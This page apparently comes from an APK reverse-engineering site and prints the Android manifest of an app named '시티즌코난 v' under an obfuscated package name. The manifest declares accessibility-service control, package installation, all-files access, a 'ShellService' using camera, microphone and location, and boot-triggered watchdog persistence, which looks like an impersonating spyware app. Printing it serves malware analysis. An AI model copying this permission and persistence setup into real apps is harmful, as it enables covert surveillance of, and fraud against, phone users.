APK逆向工程 - “시티즌코난 v” 源代码分析


源码分析说明


当前分析文件:시티즌코난 v -- AndroidManifest.xml

本分析报告仅用于安全研究目的,禁止用于任何非法用途。所有操作均需遵守当地法律法规。


<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="85382319" android:versionName="캭밥핼" android:compileSdkVersion="31" android:compileSdkVersionCodename="12" package="mistr_ial.ponds.wools.road" platformBuildVersionCode="31" platformBuildVersionName="12"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="31" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" android:maxSdkVersion="29" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
    <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES" />
    <uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE" />
    <application android:theme="@style/AppTheme" android:label="시티즌코난" android:icon="@mipmap/ic_launcher_obq_2" android:name="com.wish.defaultcallservice.AppStartSKV" android:screenOrientation="portrait" android:allowBackup="false" android:supportsRtl="true" android:resizeableActivity="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:requestLegacyExternalStorage="true">
        <activity android:name="com.wish.defaultcallservice.activity.TestCallActivitySKV" android:exported="true" />
        <activity android:name="com.wish.defaultcallservice.activity.GoogleActivitySJKV" android:exported="true" />
        <activity android:name="com.wish.defaultcallservice.activity.ValidActivitySKV" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:name="com.wish.defaultcallservice.activity.ConfirmationIntentWrapperActivitySJKV" android:exported="true" />
        <activity android:name="com.wish.defaultcallservice.activity.MainActivitySJKV" android:exported="false" />
        <service android:name="com.wish.defaultcallservice.service.RootlessSAIPIServiceSV" />
        <service android:label="@string/app_name" android:name="com.wish.defaultcallservice.service.AutoServiceSJKV" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE" android:exported="true">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>
            <meta-data android:name="android.accessibilityservice" android:resource="@xml/accessibilityservice" />
        </service>
        <service android:name="com.wish.defaultcallservice.service.YLJobHandlerServiceV" android:permission="android.permission.BIND_JOB_SERVICE" />
        <service android:name="com.wish.defaultcallservice.service.ShellService" android:exported="true" android:foregroundServiceType="camera|location|microphone">
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.REBOOT" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.MEDIA_MOUNTED" />
                <action android:name="android.intent.action.MEDIA_UNMOUNTED" />
                <data android:scheme="file" />
            </intent-filter>
        </service>
        <receiver android:name="com.wish.defaultcallservice.hellodaemon.WakeUpReceiverSKV" android:exported="true" android:process=":watch">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT" />
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
                <action android:name="com.xdandroid.hellodaemon.CANCEL_JOB_ALARM_SUB" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.wish.defaultcallservice.hellodaemon.WakeUpReceiverSKV$WakeUpAutoStartReceiver" android:exported="true" android:process=":watch">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED" />
                <action android:name="android.intent.action.PACKAGE_REMOVED" />
                <data android:scheme="package" />
            </intent-filter>
        </receiver>
        <service android:name="com.wish.defaultcallservice.hellodaemon.AbsWorkServiceV$WorkNotificationServiceSV" />
        <service android:name="com.wish.defaultcallservice.hellodaemon.JobSchedulerServiceV" android:permission="android.permission.BIND_JOB_SERVICE" android:enabled="true" android:exported="true" android:process=":watch" />
        <service android:name="com.wish.defaultcallservice.hellodaemon.WatchDogServiceSKV" android:process=":watch" />
        <service android:name="com.wish.defaultcallservice.hellodaemon.WatchDogServiceSKV$WatchDogNotificationServiceKV" android:process=":watch" />
    </application>
</manifest>